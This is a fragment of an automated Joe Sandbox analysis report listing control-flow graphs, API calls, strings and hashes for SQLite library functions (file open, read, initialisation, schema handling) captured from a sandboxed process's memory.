                                                                                                    control_flow_graph 393 61e38c73-61e38cb1 394 61e38cb3-61e38cc5 call 61e3898c 393->394 395 61e38cd1-61e38cde call 61e1796b 393->395 400 61e39002-61e3900b 394->400 401 61e38ccb-61e38cce 394->401 402 61e38ce0-61e38cf0 sqlite3_free 395->402 403 61e38cf5-61e38cfd 395->403 401->395 402->400 404 61e38d18-61e38d1f sqlite3_win32_is_nt 403->404 405 61e38cff-61e38d16 403->405 404->405 407 61e38d21-61e38d2e 404->407 406 61e38d41-61e38d5e 405->406 410 61e38d30-61e38d3f call 61e1781c 406->410 411 61e38d60 406->411 412 61e38d63-61e38d66 407->412 410->406 417 61e38d94-61e38dc1 410->417 411->412 413 61e38d92 412->413 414 61e38d68-61e38d70 412->414 413->417 416 61e38d72-61e38d8d sqlite3_free * 2 414->416 414->417 416->400 419 61e38dc3-61e38dce 417->419 420 61e38dd1-61e38df5 417->420 419->420 421 61e38e00-61e38e3e CreateFileW 420->421 422 61e38df7-61e38dfe sqlite3_win32_is_nt 420->422 424 61e38ea3-61e38eb9 call 61e26dc7 421->424 425 61e38e40-61e38e4d call 61e1781c 421->425 422->421 423 61e38e63-61e38ea1 422->423 423->424 432 61e38e54-61e38e61 call 61e1781c 423->432 433 61e38f41-61e38f45 424->433 434 61e38ebf-61e38efc call 61e26481 sqlite3_free * 2 424->434 425->421 431 61e38e4f-61e38e52 425->431 431->424 432->423 432->431 436 61e38f47-61e38f53 433->436 437 61e38f55-61e38f7e sqlite3_free * 2 433->437 445 61e38f30-61e38f35 call 61e28b37 434->445 446 61e38efe-61e38f02 434->446 436->437 440 61e38f82-61e38f91 437->440 441 61e38f80 437->441 443 61e38f93 440->443 444 61e38f97-61e38fb4 sqlite3_uri_boolean 440->444 441->440 443->444 448 61e38fb6 444->448 449 61e38fba-61e38fff 444->449 451 61e38f3a-61e38f3c 445->451 446->445 450 61e38f04-61e38f2e call 61e38c73 446->450 448->449 449->400 450->451 451->400
                                                                                                    APIs
                                                                                                    • sqlite3_free.SQLITE3 ref: 61E38CEB
                                                                                                      • Part of subcall function 61E3898C: sqlite3_free.SQLITE3 ref: 61E389FE
                                                                                                    • sqlite3_win32_is_nt.SQLITE3 ref: 61E38D18
                                                                                                    • sqlite3_free.SQLITE3 ref: 61E38D7D
                                                                                                    • sqlite3_free.SQLITE3 ref: 61E38D88
                                                                                                    • sqlite3_win32_is_nt.SQLITE3 ref: 61E38DF7
                                                                                                    • CreateFileW.KERNEL32 ref: 61E38E30
                                                                                                    • sqlite3_free.SQLITE3 ref: 61E38EE8
                                                                                                    • sqlite3_free.SQLITE3 ref: 61E38EF3
                                                                                                      • Part of subcall function 61E1781C: sqlite3_win32_sleep.SQLITE3 ref: 61E17874
                                                                                                    • sqlite3_free.SQLITE3 ref: 61E38F64
                                                                                                    • sqlite3_free.SQLITE3 ref: 61E38F6F
                                                                                                    • sqlite3_uri_boolean.SQLITE3 ref: 61E38FAD
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.627968060.0000000061E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 61E00000, based on PE: true
                                                                                                    • Associated: 00000013.00000002.627961304.0000000061E00000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627981098.0000000061E8C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627985814.0000000061E8E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627992713.0000000061E9D000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627997831.0000000061E9E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628003981.0000000061EA0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628010862.0000000061EA3000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628019116.0000000061EA4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_61e00000_findstr.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_free$sqlite3_win32_is_nt$CreateFilesqlite3_uri_booleansqlite3_win32_sleep
                                                                                                    • String ID: winOpen
                                                                                                    • API String ID: 1995518269-2556188131
                                                                                                    • Opcode ID: 49adb77ac8b3b831f20fdaec36c83601c63fc3364e482cbb3a97ecc07e7a76ec
                                                                                                    • Instruction ID: e6329ef24f41e58f8916704f82f3a9eff6f6b2eeb74c1c2f4eb0ce09deb5b482
                                                                                                    • Opcode Fuzzy Hash: 49adb77ac8b3b831f20fdaec36c83601c63fc3364e482cbb3a97ecc07e7a76ec
                                                                                                    • Instruction Fuzzy Hash: 64B1D6709047598FDB10DFA9C484B8EBBF1BF84318F208A29E8A9DB340D775D985CB41
                                                                                                    Function 61E17F2E Relevance: 19.7, APIs: 13, Instructions: 227COMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 454 61e17f2e-61e17f37 455 61e182f2 454->455 456 61e17f3d-61e17f4f call 61e08d97 454->456 459 61e17f55-61e17f7b call 61e0172e sqlite3_mutex_enter 456->459 460 61e182eb-61e182f1 456->460 463 61e17f81-61e17f88 459->463 464 61e180a2-61e180b3 459->464 460->455 467 61e17f8a-61e17f99 sqlite3_config 463->467 468 61e17f9e-61e17fc5 call 61e0172e 463->468 465 61e180d5-61e180fa sqlite3_mutex_leave sqlite3_mutex_enter 464->465 466 61e180b5-61e180cb call 61e0172e 464->466 471 61e18100-61e18107 465->471 472 61e1828c-61e182b1 sqlite3_mutex_leave sqlite3_mutex_enter 465->472 466->465 480 61e180cd-61e180cf 466->480 467->468 478 61e17fc7-61e17fcf 468->478 479 61e1801f-61e1803d 468->479 471->472 477 61e1810d-61e1815b call 61e0ff59 * 3 471->477 475 61e182b3-61e182c0 sqlite3_mutex_free 472->475 476 61e182ca-61e182d7 sqlite3_mutex_leave 472->476 475->476 476->460 500 61e18181-61e18188 477->500 501 61e1815d-61e1817a sqlite3_malloc 477->501 478->479 482 61e17fd1-61e17fd9 478->482 484 61e18047-61e1804e 479->484 480->465 483 61e182d9 480->483 482->479 486 61e17fdb-61e17ff9 482->486 487 61e182de-61e182e9 sqlite3_mutex_leave 483->487 488 61e18050-61e1805a 484->488 489 61e18065-61e1806f 484->489 491 61e17ffb-61e17ffe 486->491 487->460 488->489 492 61e1805c-61e18063 488->492 494 61e18079-61e1808b 489->494 495 61e18000-61e18006 491->495 496 61e18008-61e1801d 491->496 492->489 492->494 494->464 502 61e1808d-61e1809d 494->502 495->491 496->484 505 61e1818a-61e18199 sqlite3_config 500->505 506 61e1819e-61e181b0 500->506 503 61e181b8-61e181c9 sqlite3_free sqlite3_os_init 501->503 504 61e1817c 501->504 502->487 507 61e18282 503->507 508 61e181cf-61e181d6 503->508 504->507 505->506 506->507 512 61e181b6 506->512 507->472 510 61e18278 508->510 511 61e181dc-61e18213 508->511 510->507 513 61e18215-61e1821a 511->513 514 61e1821d-61e18244 511->514 512->501 513->514 515 61e18248-61e1824f 514->515 516 61e18251-61e1825e 515->516 517 61e18260-61e1826a 515->517 516->515 518 61e18272 517->518 519 61e1826c 517->519 518->510 519->518
                                                                                                    APIs
                                                                                                    • sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1E88E), ref: 61E17F65
                                                                                                    • sqlite3_config.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,61E2224D), ref: 61E17F99
                                                                                                    • sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1E88E), ref: 61E180E1
                                                                                                    • sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1E88E), ref: 61E180EE
                                                                                                    • sqlite3_malloc.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1E88E), ref: 61E18173
                                                                                                    • sqlite3_config.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,61E2224D), ref: 61E18199
                                                                                                    • sqlite3_free.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1E88E), ref: 61E181BB
                                                                                                    • sqlite3_os_init.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1E88E), ref: 61E181C0
                                                                                                    • sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1E88E), ref: 61E18294
                                                                                                    • sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1E88E), ref: 61E1829F
                                                                                                    • sqlite3_mutex_free.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1E88E), ref: 61E182BB
                                                                                                    • sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1E88E), ref: 61E182D0
                                                                                                    • sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1E88E), ref: 61E182E4
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.627968060.0000000061E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 61E00000, based on PE: true
                                                                                                    • Associated: 00000013.00000002.627961304.0000000061E00000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627981098.0000000061E8C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627985814.0000000061E8E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627992713.0000000061E9D000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627997831.0000000061E9E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628003981.0000000061EA0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628010862.0000000061EA3000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628019116.0000000061EA4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_61e00000_findstr.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_mutex_leave$sqlite3_mutex_enter$sqlite3_config$sqlite3_freesqlite3_mallocsqlite3_mutex_freesqlite3_os_init
                                                                                                    • String ID:
                                                                                                    • API String ID: 1590227068-0
                                                                                                    • Opcode ID: 80a5970e6370cfc5b7bc3f72f4d4c019705f10290a1ac95abcf057781b033f64
                                                                                                    • Instruction ID: 73fa22b50c015a8cab200e6346dd9cd00bf4cefcb342181f63bea50dac709f51
                                                                                                    • Opcode Fuzzy Hash: 80a5970e6370cfc5b7bc3f72f4d4c019705f10290a1ac95abcf057781b033f64
                                                                                                    • Instruction Fuzzy Hash: 6A916BB8A18A048FEF809FA8C545B897BF1FB8B319F24842ED4549B384D779D885DB41
                                                                                                    Function 61E5D697 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 202COMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 520 61e5d697-61e5d70e call 61e6ada7 523 61e5d714-61e5d728 520->523 524 61e5d928-61e5d92b 520->524 525 61e5d741-61e5d754 call 61e134fc 523->525 526 61e5d72a-61e5d72e 523->526 527 61e5d937-61e5d93e call 61e0a42b 524->527 528 61e5d92d-61e5d935 524->528 535 61e5d756-61e5d758 call 61e3cdc1 525->535 536 61e5d780-61e5d785 525->536 529 61e5d940-61e5d94a 526->529 531 61e5d734-61e5d73c 526->531 527->529 528->527 528->529 531->529 540 61e5d75d-61e5d768 535->540 537 61e5d788-61e5d79d call 61e13866 536->537 543 61e5d79f-61e5d7ac 537->543 540->536 542 61e5d76a-61e5d77b call 61e0c080 call 61e115fd 540->542 557 61e5d920-61e5d923 call 61e0ae68 542->557 545 61e5d7cf-61e5d7d9 543->545 546 61e5d7ae-61e5d7b2 543->546 551 61e5d7de-61e5d7ee 545->551 549 61e5d7b4-61e5d7be 546->549 550 61e5d7c0-61e5d7cb 546->550 549->551 553 61e5d833-61e5d842 call 61e115fd 550->553 554 61e5d7cd 550->554 555 61e5d7f0-61e5d80a call 61e02207 call 61e13ba7 551->555 556 61e5d80f-61e5d81f 551->556 568 61e5d912-61e5d916 553->568 554->551 555->556 558 61e5d825-61e5d82c 556->558 559 61e5d821 556->559 557->524 562 61e5d847-61e5d84a 558->562 563 61e5d82e 558->563 559->558 569 61e5d84c-61e5d850 562->569 570 61e5d859-61e5d8d5 call 61e30cf3 sqlite3_exec call 61e0f9e9 562->570 563->553 568->557 571 61e5d918-61e5d91b call 61e4279a 568->571 569->570 572 61e5d852 569->572 578 61e5d8d7-61e5d8dc call 61e5d5bd 570->578 579 61e5d8e1-61e5d8e5 570->579 571->557 572->570 578->579 581 61e5d8f5-61e5d8f7 579->581 582 61e5d8e7-61e5d8f3 call 61e135c5 579->582 584 61e5d90c-61e5d910 581->584 585 61e5d8f9-61e5d90a 581->585 582->584 584->568 584->585 585->568
                                                                                                    Strings
                                                                                                    • unsupported file format, xrefs: 61E5D82E
                                                                                                    • sqlite_temp_master, xrefs: 61E5D6AE
                                                                                                    • sqlite_master, xrefs: 61E5D69F
                                                                                                    • attached databases must use the same text encoding as main database, xrefs: 61E5D7C4
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.627968060.0000000061E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 61E00000, based on PE: true
                                                                                                    • Associated: 00000013.00000002.627961304.0000000061E00000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627981098.0000000061E8C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627985814.0000000061E8E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627992713.0000000061E9D000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627997831.0000000061E9E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628003981.0000000061EA0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628010862.0000000061EA3000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628019116.0000000061EA4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_61e00000_findstr.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: attached databases must use the same text encoding as main database$sqlite_master$sqlite_temp_master$unsupported file format
                                                                                                    • API String ID: 0-2834926380
                                                                                                    • Opcode ID: 8739f13f59b9245f99ca6944896ae9b81abf59a9b8b531b7f047787198e01ecd
                                                                                                    • Instruction ID: 1be8f6910a3ae35ae87dffa4376a615c56992fe466103ec56f342520aa12577b
                                                                                                    • Opcode Fuzzy Hash: 8739f13f59b9245f99ca6944896ae9b81abf59a9b8b531b7f047787198e01ecd
                                                                                                    • Instruction Fuzzy Hash: 89911478A043488BDB51CFA9C480B8EBBF2BF88318F24C42DD8599B355D776E856CB41
                                                                                                    Function 61E3CDC1 Relevance: 7.9, APIs: 4, Strings: 1, Instructions: 423COMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 587 61e3cdc1-61e3cde0 call 61e134fc 590 61e3d303-61e3d305 587->590 591 61e3cde6-61e3cdea 587->591 594 61e3d310-61e3d312 590->594 592 61e3cdf6-61e3cdfc 591->592 593 61e3cdec-61e3cdf0 591->593 595 61e3ce0a-61e3ce0e 592->595 596 61e3cdfe-61e3ce02 592->596 593->592 593->594 597 61e3d314-61e3d318 594->597 598 61e3d33b-61e3d352 call 61e0ae68 594->598 602 61e3ce10-61e3ce14 595->602 603 61e3ce16-61e3ce18 595->603 600 61e3d307-61e3d30c 596->600 601 61e3ce08 596->601 597->598 604 61e3d31a-61e3d32c 597->604 600->594 601->603 602->603 606 61e3ce1a-61e3ce1f 602->606 603->606 607 61e3ce21-61e3ce25 603->607 604->598 608 61e3d32e-61e3d332 604->608 609 61e3ce3e-61e3ce45 606->609 610 61e3ce27 607->610 611 61e3ce4b-61e3ce5f call 61e02c9d 607->611 608->598 612 61e3d334-61e3d339 call 61e12a6b 608->612 609->594 609->611 614 61e3ce2a-61e3ce2c 610->614 621 61e3ce65-61e3ce74 611->621 622 61e3d30e 611->622 612->598 614->611 616 61e3ce2e-61e3ce33 614->616 619 61e3ce35-61e3ce37 616->619 620 61e3ce39-61e3ce3c 616->620 619->609 620->614 623 61e3ce76-61e3ce79 621->623 624 61e3ce7d-61e3ce82 621->624 622->594 623->624 625 61e3ce85-61e3ce89 624->625 626 61e3d0e1-61e3d0e3 625->626 627 61e3ce8f-61e3ce9a call 61e3a382 625->627 628 61e3d233-61e3d235 626->628 629 61e3d0e9-61e3d0ed 626->629 627->626 638 61e3cea0-61e3ceb1 call 61e0300e 627->638 633 61e3d237-61e3d239 628->633 634 61e3d23b-61e3d245 call 61e3bbe6 628->634 629->628 631 61e3d0f3-61e3d0fc 629->631 631->634 637 61e3d102-61e3d109 631->637 635 61e3d248-61e3d24b 633->635 634->635 640 61e3d272-61e3d274 635->640 641 61e3d24d-61e3d251 635->641 637->634 642 61e3d10f-61e3d120 637->642 644 61e3ceb6-61e3ceba 638->644 640->594 646 61e3d27a-61e3d281 640->646 641->594 645 61e3d257-61e3d267 call 61e055eb 641->645 647 61e3d126-61e3d12e 642->647 648 61e3d224-61e3d228 642->648 644->626 651 61e3cec0-61e3ceda 644->651 645->625 670 61e3d26d 645->670 653 61e3d283-61e3d28a 646->653 654 61e3d2a1-61e3d2b3 646->654 649 61e3d134-61e3d138 647->649 650 61e3d1f8-61e3d20a call 61e14b47 647->650 648->633 655 61e3d22a-61e3d231 call 61e3cd09 648->655 656 61e3d13a-61e3d13e 649->656 657 61e3d16e-61e3d17d 649->657 676 61e3d21e-61e3d220 650->676 677 61e3d20c-61e3d20e 650->677 659 61e3cf0a-61e3cf0d 651->659 660 61e3cedc-61e3cf08 memcmp 651->660 653->654 662 61e3d28c-61e3d29e 653->662 664 61e3d2b5 654->664 665 61e3d2b8-61e3d2bc 654->665 655->628 656->657 667 61e3d140-61e3d150 call 61e14b47 656->667 657->634 671 61e3d183-61e3d195 call 61e0ada8 657->671 669 61e3cf10-61e3cf14 659->669 660->669 662->654 664->665 665->598 666 61e3d2be-61e3d2d2 665->666 673 61e3d2d7-61e3d2e6 666->673 674 61e3d2d4 666->674 667->634 690 61e3d156-61e3d16a call 61e0ad86 667->690 678 61e3d066-61e3d0be 669->678 679 61e3cf1a-61e3cf37 memcmp 669->679 670->594 671->634 695 61e3d19b-61e3d1bd memcmp 671->695 673->604 681 61e3d2e8-61e3d2f4 call 61e39993 673->681 674->673 686 61e3d222 676->686 687 61e3d1bf-61e3d1dd 676->687 677->676 683 61e3d210-61e3d21c call 61e14b96 677->683 678->625 684 61e3d0c3 679->684 685 61e3cf3d-61e3cf44 679->685 681->594 702 61e3d2f6-61e3d301 681->702 683->676 692 61e3d0c8-61e3d0d7 call 61e3b35f 684->692 693 61e3cf46 685->693 694 61e3cf4b-61e3cf4f 685->694 686->634 687->648 690->657 710 61e3d0d9-61e3d0db 692->710 693->694 694->684 700 61e3cf55 694->700 695->687 701 61e3d1df-61e3d1f6 call 61e0ae03 695->701 705 61e3cf93-61e3cfb3 memcmp 700->705 706 61e3cf57-61e3cf5b 700->706 701->634 702->594 705->684 709 61e3cfb9-61e3cfd4 705->709 706->705 711 61e3cf5d-61e3cf75 call 61e8a40a 706->711 709->684 712 61e3cfda-61e3cfe5 709->712 710->625 710->626 711->692 718 61e3cf7b-61e3cf82 711->718 712->684 714 61e3cfeb-61e3cffa 712->714 716 61e3d02c-61e3d033 714->716 717 61e3cffc-61e3d027 call 61e3b35f call 61e0af6b call 61e14499 714->717 720 61e3d035-61e3d03b 716->720 721 61e3d04b-61e3d051 716->721 717->710 718->705 722 61e3cf84-61e3cf8e call 61e3b35f 718->722 720->721 726 61e3d03d-61e3d049 call 61e2751f 720->726 721->684 724 61e3d053-61e3d062 721->724 722->625 724->678 726->692
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.627968060.0000000061E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 61E00000, based on PE: true
                                                                                                    • Associated: 00000013.00000002.627961304.0000000061E00000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627981098.0000000061E8C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627985814.0000000061E8E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627992713.0000000061E9D000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627997831.0000000061E9E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628003981.0000000061EA0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628010862.0000000061EA3000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628019116.0000000061EA4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_61e00000_findstr.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memcmp$sqlite3_mutex_try
                                                                                                    • String ID: 0
                                                                                                    • API String ID: 2794522359-4108050209
                                                                                                    • Opcode ID: d5c7d553be4ccfe833e47b58c5c820338c12739a1a8f5454219947979e8f550f
                                                                                                    • Instruction ID: 786c7f98bf4c6c3a3e249f4f49677c74471b5160d10ff668d6a4710e3668878d
                                                                                                    • Opcode Fuzzy Hash: d5c7d553be4ccfe833e47b58c5c820338c12739a1a8f5454219947979e8f550f
                                                                                                    • Instruction Fuzzy Hash: E202AF74A052658FEB05CFA9C08079EBBF1BFC9318F64C56AE8469B381D774E885CB50
                                                                                                    Function 61E5DE8A Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 176COMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                      • Part of subcall function 61E03D95: sqlite3_stricmp.SQLITE3 ref: 61E03DC2
                                                                                                      • Part of subcall function 61E03D95: sqlite3_stricmp.SQLITE3 ref: 61E03DDA
                                                                                                    • sqlite3_strnicmp.SQLITE3 ref: 61E5DF16
                                                                                                      • Part of subcall function 61E04501: sqlite3_stricmp.SQLITE3 ref: 61E04534
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.627968060.0000000061E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 61E00000, based on PE: true
                                                                                                    • Associated: 00000013.00000002.627961304.0000000061E00000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627981098.0000000061E8C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627985814.0000000061E8E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627992713.0000000061E9D000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627997831.0000000061E9E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628003981.0000000061EA0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628010862.0000000061EA3000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628019116.0000000061EA4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_61e00000_findstr.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_stricmp$sqlite3_strnicmp
                                                                                                    • String ID: no such table$no such view$a
                                                                                                    • API String ID: 2198927396-2766804909
                                                                                                    • Opcode ID: 3dc196702ad696232c7d7ff74c9327f507a8a2d56c619baae405a905a5a1f322
                                                                                                    • Instruction ID: bdc448d37d95c4fff2c788df1c328a5e009ca0cc8d30dd90e6a25b25119044c8
                                                                                                    • Opcode Fuzzy Hash: 3dc196702ad696232c7d7ff74c9327f507a8a2d56c619baae405a905a5a1f322
                                                                                                    • Instruction Fuzzy Hash: 8B611374B057469BDB44DFA9C480A4EBBF1BF88348F20C42DE859DB314EB76E8518B91
                                                                                                    Function 61E272A7 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 106fileCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 974 61e272a7-61e272cf 975 61e272d1 974->975 976 61e27319-61e27338 974->976 978 61e272d3-61e272d6 975->978 979 61e272d8-61e272e7 975->979 977 61e2733b-61e27362 ReadFile 976->977 980 61e27364-61e27377 call 61e26dc7 977->980 981 61e2737d-61e27386 977->981 978->976 978->979 982 61e272e9 979->982 983 61e272fc-61e27316 979->983 987 61e27379-61e2737b 980->987 990 61e273bc-61e273c8 980->990 981->980 992 61e27388-61e27395 call 61e1781c 981->992 985 61e272eb-61e272ed 982->985 986 61e272ef-61e272fa 982->986 983->976 985->983 985->986 986->987 991 61e273cd-61e273d4 987->991 990->991 992->977 995 61e27397-61e273ba call 61e26481 992->995 995->991
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.627968060.0000000061E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 61E00000, based on PE: true
                                                                                                    • Associated: 00000013.00000002.627961304.0000000061E00000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627981098.0000000061E8C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627985814.0000000061E8E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627992713.0000000061E9D000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627997831.0000000061E9E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628003981.0000000061EA0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628010862.0000000061EA3000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628019116.0000000061EA4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_61e00000_findstr.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FileRead
                                                                                                    • String ID: winRead
                                                                                                    • API String ID: 2738559852-2759563040
                                                                                                    • Opcode ID: 5d8038751a82f134f99a0a7a259cd409cb26f714c0bee21373308b17d2acead1
                                                                                                    • Instruction ID: fa3fdd52a5bd0e73c2820272329c91b65345a39805b42513b8c1f8e61fe294ac
                                                                                                    • Opcode Fuzzy Hash: 5d8038751a82f134f99a0a7a259cd409cb26f714c0bee21373308b17d2acead1
                                                                                                    • Instruction Fuzzy Hash: 45410F71E00259DBCF44DFA9D89158EBBF2BF89314F21852AEC28A7304D730E942CB91

                                                                                                    Non-executed Functions

                                                                                                    Function 61E245F1 Relevance: 10.7, APIs: 7, Instructions: 247COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • sqlite3_value_int.SQLITE3 ref: 61E24646
                                                                                                    • sqlite3_value_bytes.SQLITE3 ref: 61E24666
                                                                                                    • sqlite3_value_blob.SQLITE3 ref: 61E24673
                                                                                                    • sqlite3_value_text.SQLITE3 ref: 61E2468A
                                                                                                    • sqlite3_value_int.SQLITE3 ref: 61E246DA
                                                                                                    • sqlite3_result_text64.SQLITE3 ref: 61E2482A
                                                                                                    • sqlite3_result_blob64.SQLITE3 ref: 61E24884
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.627968060.0000000061E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 61E00000, based on PE: true
                                                                                                    • Associated: 00000013.00000002.627961304.0000000061E00000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627981098.0000000061E8C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627985814.0000000061E8E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627992713.0000000061E9D000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627997831.0000000061E9E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628003981.0000000061EA0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628010862.0000000061EA3000.00000008.00000001.01000000.0000000D.sdmpDownload File
